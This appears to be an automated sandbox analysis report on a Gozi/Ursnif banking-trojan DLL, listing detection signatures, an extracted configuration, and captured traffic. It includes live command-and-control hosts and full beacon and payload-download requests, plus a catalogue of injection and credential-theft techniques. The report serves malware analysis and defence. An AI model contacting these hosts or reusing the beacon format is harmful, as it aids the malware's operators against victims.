Analysis Report crypt_3300.dll

Overview

General Information

Sample Name: crypt_3300.dll
Analysis ID: 343315
MD5: 1f760b56c552060d55aa4a2902133e1f
SHA1: a7b95e6aa8cb4d2fb83da38a78bb6964ffe4bd8f
SHA256: 2b8c7b7112e8070d01b2f977c360772e05704fff1838bf124780b9c8b699f337
Tags: dll

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: regsvr32.exe.5720.1.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "177", "system": "e19be6dad02dea156580dfb2e09e5e52hh", "size": "201292", "crc": "2", "action": "00000000", "id": "3300", "time": "1611371430", "user": "1082ab698695dc15e71ab15c82c4a804", "hash": "0xa6ea74ae", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at Virustotal: Detection: 8%
Source: api3.lepini.at Virustotal: Detection: 10%
Source: api10.laptok.at Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: crypt_3300.dll Virustotal: Detection: 7%

Compliance:

Uses 32bit PE files
Source: crypt_3300.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49736 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.440428591.000001FC308B0000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.449984223.00000241EFD80000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000026.00000000.477442156.000000000E420000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.463267415.00000000057E0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.463267415.00000000057E0000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000026.00000000.477442156.000000000E420000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00A5E0BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_00A6888D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A74FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_00A74FE1
Source: C:\Windows\explorer.exe Code function: 38_2_03B5B9E8 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 38_2_03B5B9E8
Source: C:\Windows\explorer.exe Code function: 38_2_03B5ECE0 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose, 38_2_03B5ECE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A605EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_00A605EF

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 151.101.1.44
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: global traffic HTTP traffic detected: GET /api1/CFw0exYOLBE1WOQ6Mn_2BQq/AbMRr9o39B/QrT2i_2BUXb4t9pmn/0lERtiOHlDPB/RvBQZDQ0_2B/XcdNPmTbjSCSkh/LGQj235_2Bzaj4iiE_2BZ/8BOeUfWxCKBDqbW5/305v3z_2Ba56K_2/BNLTprCr0kysMxydNd/QsemKPZya/UWdQMBXIKo51HLvlVE_2/F3BBwvriajKBQr8Ak4R/aT9_2Bw9XoTYMHGlK7kzVs/5gAtMcR1uDZ1K/ECQPLzKd/mvsohtKAfiZi1BZl2tbNMzk/iXtWcjTRcn/5oeMCiT_2BqRqn61F/cBlYM5UfYYiG/Fi3kDfXZStE/6LqXXR_2F0pKhw/O_2Brkkk/_2F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/a_2Bz4YtSSFgT/0C5wRpet/ms8q1CZiIpjOdJS4vfA_2BH/Unc80mniR4/LWmVTbc4wtziyZI4c/s8JLaiXVyJRz/Ia68C_2BiO1/v0aHN6LC2uzwce/oGYSvt_2FR9qcBq8fN2ZR/l4rY1Qe5NTT0wAlG/U6poigPerNGHrZu/8qcNuouKcdOcsfERjf/Dfr4PAcFd/vSa3xs7frQEfOOeZB0vB/vZy6iry9vQbVgCKSl4S/0bhQUTeB7wVuA8lFu_2FvC/mrJ4FGk4dNxHd/NvkUgggq/QTKdhVP6VWf6cx1FjBJVmjH/mbHnltL2SM/BqdtHsO_2BXjavC29/BKgPQ6DT/TlOI0 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/97Bobw5s_2BJD9JdpaeHl/eaFIuMTgpYC6kyVz/wkVXHzbguzU8joj/iVFWbWAdj_2B9KihCY/jMd9cLfS3/oUwhf1e4_2BfL6_2FnUw/GLpqU7X6eDSfadKgO93/vdNVieORUa2lyA9rRTGL_2/FZE66To6WbaMR/57fzsKgx/FORuzev7x9UGQWVFO_2Bpeg/Wvs_2BYY_2/FsZiQOB29KHr_2Fal/WE_2F_2Fhffr/YZCPuD4E3bZ/RTtWZ0xleQwCeU/RtKoykqxZaK3WHH71HVec/H322WPBdAyKedu47/SMQTtvEQEYL6Ruh/BdDKv8Vz_2FBmqrfdt/A_2F9Y1cY/8wr9fecB_2FBDRCD/5p5CM HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/aswBTjQ4E_2B_/2FPVHi26/F6MnWvHM59IfwFvPMyloaUi/ZdEXHmjh9l/GuUpdE5gAL_2BiwLk/OvzwM3VHZTr_/2Bi5hCWeweE/RDbM_2FDLormln/D5u23sLsNQY4uTSsot2UU/aPO_2FNPBiGyGyqq/s7z4x4ukwrK32If/M9iLwjW2qV3Vr8dNGH/q140lsiDv/T7miJKK0tGN_2FJkKKLX/Cm6sjguLhyPX9arxoel/JMM2f5VEC0AG9Wn6vSkHjJ/nDToUkTHrKvpT/3Wk4CBsP/r0HCE6xNU4Qc_2FkWiw3FEh/ucPyPfDjzrsgr097bADyD/Lr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/yZN5x8AU1/f2l9_2BDk3SyJKCm0b9b/CpWCXqygnlCMKczKhFt/aUvaHjWobYkO38UNm53uP5/5R_2FdKLiGt3q/T_2FbZYT/PDvrYRscHMvAhEzl_2F_2B0/2ikk6uOsaJ/kIfnZQ1ztpC62gFGv/P1mqwU8mDefG/yjBn2N1MiSD/GUZwJFX3oztFwR/onkOOAeBD5WkYQs_2FJht/8kT_2FI3gWn_2BJh/eIjqJ1W8_2FQNm2/Ia6dzqJh5iH4SrCJDK/5Piz1ULur/BABO6rSkLO4ShfMGkMUu/cDt8M0heKfxbEyNRecC/6zuUh3b4d0zydbKfh/4j1x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: unknown HTTP traffic detected: POST /api1/TZTh6_2BkS3c6X/g2npKVRL7cED2dW4yfoz7/1IAgoDfDBaFBh7Kf/s6YPUhhW_2FFOZ4/UfzmASW14dw3GpBMgd/QQTnLy2bn/m47chdfHlbOoStOxiBbF/PVT2YFBWKLhFbou4dcn/rE5edFIASJWWcLmRPujXLx/YI4PYsQdo9LaX/3eFG1EEZ/Sr_2BcwaypXnMHBWu5GiCkg/zhC1mAh91E/nklp0T0h9PwUy8pf3/AvjhI9VAq5aQ/c4y8dg0dcfo/9agKfUuutMqiH4/39h5RIbncwwhgCP2Fp4X_/2F1RiD0H_2BsV2ed/FGqO7Z8iv/B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Jan 2021 18:10:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000026.00000000.477893700.000000000EE20000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000026.00000000.477893700.000000000EE20000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: powershell.exe, 0000001E.00000002.487850335.00000274579D0000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
